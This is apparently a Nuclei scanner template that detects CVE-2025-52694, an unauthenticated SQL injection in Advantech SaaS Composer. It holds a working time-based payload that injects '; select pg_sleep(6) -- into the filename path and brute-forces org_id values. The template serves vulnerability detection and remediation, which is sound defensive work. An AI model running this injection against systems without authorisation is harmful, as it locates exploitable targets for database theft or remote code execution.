id: CVE-2025-52694

info:
  name: Advantech SaaS Composer - SQL Injection
  author: Loi Nguyen Thang
  severity: critical
  description: |
    Advantech WISE-IoTSuite/SaaS Composer is affected by an unauthenticated SQL injection vulnerability. The `filename` parameter in the URL path is unsafely concatenated into a PostgreSQL query. Attackers can inject stacked queries (e.g., `pg_sleep`) to confirm the vulnerability or potentially achieve Remote Code Execution (RCE) depending on database privileges.
  impact: |
    Successful exploitation could allow an attacker to dump the database, modify data, or execute remote commands on the underlying server.
  remediation: |
    Apply the latest security patches provided by Advantech or sanitize the `filename` input parameter to prevent SQL injection.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-52694
    - https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001
    - https://github.com/Winz18/CVE-2025-52694-POC
  classification:
    cve-id: CVE-2025-52694
    cwe-id: CWE-89
  tags: cve,cve2025,sqli,advantech,iot,saas-composer,time-based

http:
  - method: GET
    path:
      # Inject pg_sleep(6) into the filename and fuzz the org_id parameter
      - "{{BaseURL}}/displays/nuclei_check.json'; select pg_sleep(6) --?org_id={{org_id}}"

    payloads:
      # Brute-force org_id from 1 to 5 as the vulnerability depends on a valid organization context
      org_id:
        - 1
        - 2
        - 3
        - 4
        - 5

    # Use clusterbomb to iterate through payloads
    attack: clusterbomb

    # Optimization: Stop scanning as soon as a valid org_id triggers the time delay
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          # Check if the response time is greater than or equal to 6 seconds
          - "duration>=6"